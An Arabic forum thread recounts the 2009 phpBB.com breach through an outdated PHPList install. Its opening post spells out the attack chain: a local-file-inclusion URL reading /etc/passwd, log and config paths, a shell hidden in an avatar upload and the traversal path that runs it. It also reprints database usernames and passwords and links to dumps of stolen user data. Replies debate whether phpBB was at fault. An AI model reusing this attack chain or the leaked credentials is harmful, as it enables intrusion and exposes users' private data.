النتائج 1 إلى 12 من 12

الموضوع: phpBB.com Hacked

  1. #1
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316

    Arrow phpBB.com Hacked



    السلام عليكم ...

    بصراحة اليوم فاجئني خبر من صديق لي يقلي على إختراق موقع البرنامج الشهير www.phpBB.com

    حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist المعروف ايضا ولاكن للاسف قبل ايام قليلة

    طرحت ثغره فيه بلميلورم

    الثغره عبارة عن Local File Inclusion Exploit حيث قام المخترق بلولوج لملف ال/etc/passwd لسيرفر البرنامج عن طريق الامر

    كود:
    http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd
    والملف طبعا تم رفعه على الرايبد شير

    كود:
    http://rapidshare.com/files/192159914/etc.txt
    ومن ثم توجه الى ملف الاباتشي لمعرفه مسار الموقع

    كود:
    /etc/httpd/conf/httpd.conf
    وتم الوصول لملف الإيرر

    كود:
    /home/logs/phpbb.com/error_log
    ومن ثم تم معرفة مسار منتديات الphpBB

    كود:
    home/virtual/phpbb.com/community
    ومعروف عن منتديات الphpBB انك تستطيع حقن كود (شيل) بملف الerror log , ولو تركب منتدى phpBB بجهازك تشوف المسار يكون كدا

    كود:
    /home/virtual/phpbb.com/community/images/avatars/upload
    وثم تم حقن الكود (شيل) عن طريق رفع الصورة

    كود:
    (secret hash)_userid.jpg
    ومن ثم قام بمعرفة السيكريت كود حق الشل ( الصورة ) عن طريقة ملف الإيرر لوج الي تم إيضاحه مسبقا

    كود:
    f51ee61fe7a83fdf72780912bced0855
    وبعدها يصير كل مايبي يشغل الكود ( الشيل ) بلطريقة هذه ( مثل تخطي المود سيكيورتي)..

    كود:
    /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
    وهذه الطريقة كان المخترق بيمتحن سيرفرهم اذا تمشي عليهم ام لا ... بحيث كان السكربت يقرا الكونفيج

    كود:
    /home/virtual/phpbb.com/community/config.php
    كود:
    $dbms = 'mysqli';
    $dbhost = 'phpbb.db.osuosl.org';
    $dbport = '';
    $dbname = 'phpbb';
    $dbuser = 'phpbb2';
    $dbpasswd = 'saxM9nfRjLbJ2Yy5';
    $table_prefix = 'community_';
    وتم قرائة ملف الكونفيج لبرنامج الPHPLIST :dالمصيبة هذا هع هع
    كود:
    $database_host = "localhost";
    $database_name = "phpbb_phplist";
    $database_user = 'phplist';
    $database_password = 'Berti3_Danc3';
    طبعا هذه الطريقة شرحتها لكم من موقع قام بعمله على الرابط http://hackedphpbb.blogspot.com/

    وبلنهاية تم سحب باسووردات الاعضاء اكثر من 200.000 الف عضو بلإضافة الى باسووردات وايميلات مشتركين بنحو

    400.000 الف عضو ! والمصيبة انه باسوورداتهم كلها كلير تكست !!!!

    وهذه القواعد ومعلومات الأعضاء وايميلاتهم تم رفعها على الرايبد شير

    كود:
    http://rapidshare.com/files/192305758/out.txt
    http://rapidshare.com/files/192304153/phpbb_users.sql
    http://hackedphpbb.pastebin.com/f1399b3e8
    http://rapidshare.com/files/192261517/backup_sql.gz

    وبلنهاية رسالتهم من الموقع !

    كود:
    Maintenance
    
    We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself.
    
    You can download phpBB here: http://www.ohloh.net/p/phpbb
    
    You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb
    
    – the phpBB team
    ونتمنى من الاخوة اخذ الإختراق هذا موعظة لعدم نسيان او التهاون بوجود ملفات قديمة بلمنتدى !

    حيث انه المخترق كان عضو قديم بلمنتدى وتذكر ! انه الموقع يحتوي على البرنامج المصاب !

    وقام المخترق بتوضيح إختراقه للموقع حيث قال

    كود:
    -----------------------------------UPDATE
    to all that same i am a script kiddie, **** you
    phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
    تحياتي !

    :nice:
    المصـــدر





    __________________
    مشعل
    ze3ex@hotmail.com


  2. #2
    فضلاً اكتب اسمك الحقيقي هنا
    زائرечр

    رد



    انت تتكلم على phpbb2 فعلاً كانت فى ثغرات وتم اصلاحها والان phpbb3 أقوى

    طيب هل تقصد بموضوع ان vBulletin أمان ودائماً نشاهد منتديات عربية مخترقة XD

    لايوجد شيء على الانترنت امن بضل التطور الكبير اللى وصلوا لة الهكرز

    كنت اقراء فى مجلة فى العام 2005 << غبار

    تقول هجوم اليوم صفر كانت متفائلة ان تنخفظ القرصنة و الهكرز والهجمات الى الصفر فى عالم 2008

    ولكن للاسف الصفر يذهب على اليمن ويزداد العدد لوووولز حتى ان الهكرز الان اصبحوا اكثر تطورنى من السابق

    لا تستغرب اذا سمعت موضوع يكون عنوانة Google Hacked فى يوم من الايام






  3. #3
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    135


    والمصيبة انه باسوورداتهم كلها كلير تكست !!!!
    فقط للتوضيح فهذه المعلومة غير صحيحة
    كلمات السر تكون مشفرة في قاعدة البيانات






  4. #4
    عضو جديد
    تاريخ التسجيل
    Dec 2008
    المشاركات
    15


    أنا أرى ان المنتديات التى أثبتت جداراتها فى مجالات الحماية هي منتديات IPB وبجدارة

    و ان شاء الله الجيل الثالث أقوى و كله مميزات

    و اتوقع ان يذهب مستخدمى الـ VB و الـ PHP وغيرهم الى منتديات الـ IPB بعد ان يرووا المميزات الخارقه الموجوده فيها






  5. #5
    عضو فعال جدا
    تاريخ التسجيل
    Sep 2006
    المشاركات
    3,006


    وش جاكم ^^ ؟؟؟
    ومين قال ان الـphpbb مو محميه الإختراق عن طريق برنامج PHPlist وهالبرنامج مادري وشو واول مره اسمع فيه بس شكله من نفس برمجة فريق phpbb وكان مرفوع على نفس السيرفر وقدرو من خلال رفع شل على PHPlist انهم ينتقلون بالسيرفر لـ phpbb ^^
    واي برنامج مصاب بالسيرفر لو انك مركب سكربت برمجه خاصه ومحمي تقدر توووصل له لان كل برنامج له كونفق ^^ والكونفق مجرد معرفة معلوماته تتصل فيه عن طريق اي برنامج وتقدر تحوس بقواعده ^^





    __________________
    p-king-p@hotmail.com


    الرجاء مراجعة الموضوع للجميع :
    http://www.swalif.net/softs/swalif12/softs302945

  6. #6
    عضو نشيط
    تاريخ التسجيل
    Jan 2005
    المشاركات
    290


    حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist
    هذا يثبت أن الاختراق لم يكن من برنامج المنتديات phpBB3 وهذا هو المهم!!
    أحياناً قد يكون الاختراق عن طريق اختراق السيرفر نفسه وهذا لا يعيب برنامج المنتديات phpBB3





    __________________
    ∂∂∂∂∂∂∂∂∂∂∂∂∂∂∂∂∂∂
    http://www.m6nu5.com

  7. #7
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    97


    1- الارقام السرية للاعضاء كلها مشفرة و ليست كلير تكست على الاطلاق

    phpBB32- آمنة 100% و ذلك عن تجربة طويلة جدا جدا بدون اى اختراق و كما هو واضح الاختراق تم عن طريق phplist و هى ليست من برمجة فريق phpBB انما هى سكربت جاهز و مجانى للقوائم البريدية

    3- ارجو تعديل الموضوع لانه يحتوى على معلومات كثيرة خاطئة ، و ارجو حذف كل الروابط لانها لم تعد تعمل و تم حذفها بالكامل .






  8. #8
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    فقط للتوضيح فهذه المعلومة غير صحيحة
    كلمات السر تكون مشفرة في قاعدة البيانات
    لا اخي لو قرات الموضوع صحيح لكن عرفت قصدي بها انه الباسووردات كلير لبرنامج phplist

    وليس phpbb علما بانه تم فك الباسووردات للهاش 200 الف عضو تم فك 46000 الف باسوورد من الهاش !





    __________________
    مشعل
    ze3ex@hotmail.com

  9. #9
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    أنا أرى ان المنتديات التى أثبتت جداراتها فى مجالات الحماية هي منتديات IPB وبجدارة

    و ان شاء الله الجيل الثالث أقوى و كله مميزات

    و اتوقع ان يذهب مستخدمى الـ VB و الـ PHP وغيرهم الى منتديات الـ IPB بعد ان يرووا المميزات الخارقه الموجوده فيها
    صحيح كلامك اخي مع العلم المنتديات هذه ظهر لهاثغره ريموت طيحت الموقع الرئيسي لهم وكثير مواقع مشهورة اخرى





    __________________
    مشعل
    ze3ex@hotmail.com

  10. #10
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    وش جاكم ^^ ؟؟؟
    ومين قال ان الـphpbb مو محميه الإختراق عن طريق برنامج PHPlist وهالبرنامج مادري وشو واول مره اسمع فيه بس شكله من نفس برمجة فريق phpbb وكان مرفوع على نفس السيرفر وقدرو من خلال رفع شل على PHPlist انهم ينتقلون بالسيرفر لـ phpbb ^^
    واي برنامج مصاب بالسيرفر لو انك مركب سكربت برمجه خاصه ومحمي تقدر توووصل له لان كل برنامج له كونفق ^^ والكونفق مجرد معرفة معلوماته تتصل فيه عن طريق اي برنامج وتقدر تحوس بقواعده ^^
    هذا الي صار 100% اخي ... لو تشوف الموقع الرئيسي يبين لك انه البرنامج phpBB مابيه اي عيب وكل الإختراق تم عن طريق ثغره ببرنامج الPHPlist كما وضحنا سابقا ..

    ياريت شباب تقروا الموضوع بفهم شوية وماتجاوبون اي جواب من عندكم بدون علم فيه ...

    تحياتي .





    __________________
    مشعل
    ze3ex@hotmail.com

  11. #11
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات
    316


    1- الارقام السرية للاعضاء كلها مشفرة و ليست كلير تكست على الاطلاق

    phpBB32- آمنة 100% و ذلك عن تجربة طويلة جدا جدا بدون اى اختراق و كما هو واضح الاختراق تم عن طريق phplist و هى ليست من برمجة فريق phpBB انما هى سكربت جاهز و مجانى للقوائم البريدية

    3- ارجو تعديل الموضوع لانه يحتوى على معلومات كثيرة خاطئة ، و ارجو حذف كل الروابط لانها لم تعد تعمل و تم حذفها بالكامل .

    اكرر مره ثانية الاختراق تم عن طريق برنامج الPHPlist وليس phpbb !!! فلا تقولي البرنامج امن اخي ...

    الموضوع مبين انه البرنامج تم اختراقه عن طريق ثغره ! ماهي شغله صعبه لتنفهم انه البرنامج مابيه اي ثغره وتم الوصول لإختراقه عن طريق برنامج اخر !

    حتى برنامج الشهير Wordpress يخترقونه الايام هذه عن طريق برامج البلاقن التكون على المسار

    home/username/public_html/wordpress/wp-content/plugins

    هذا الملف يحتوي على البلاقن المركب بلموقع ومنه يتم اختراق الموقع إن وجد ثغره بإحدى الهاكات المركبة ! وهذا لا يعني العيب بلبرنامج وإنما العيب بصاحب البرنامج الي يركب الهاكات بدون لاعلم له بتأثيراتها ...

    حتى ايميلات والمواقع المسجلة عن طريق جوجل كانت لتخترق لو زالت الثغره XSS موجودة فيه !

    قبل يومين نزلت ثغره بجوجل XSS تخليك تدخل على اي حساب جوجل وتغير معلوماتة !!

    30/01/2009 - Google xss - سوالف سوفت

    تحياتي .





    __________________
    مشعل
    ze3ex@hotmail.com

  12. #12





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  
اعلانات سوالف
0
أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري |خدماتي | مقروء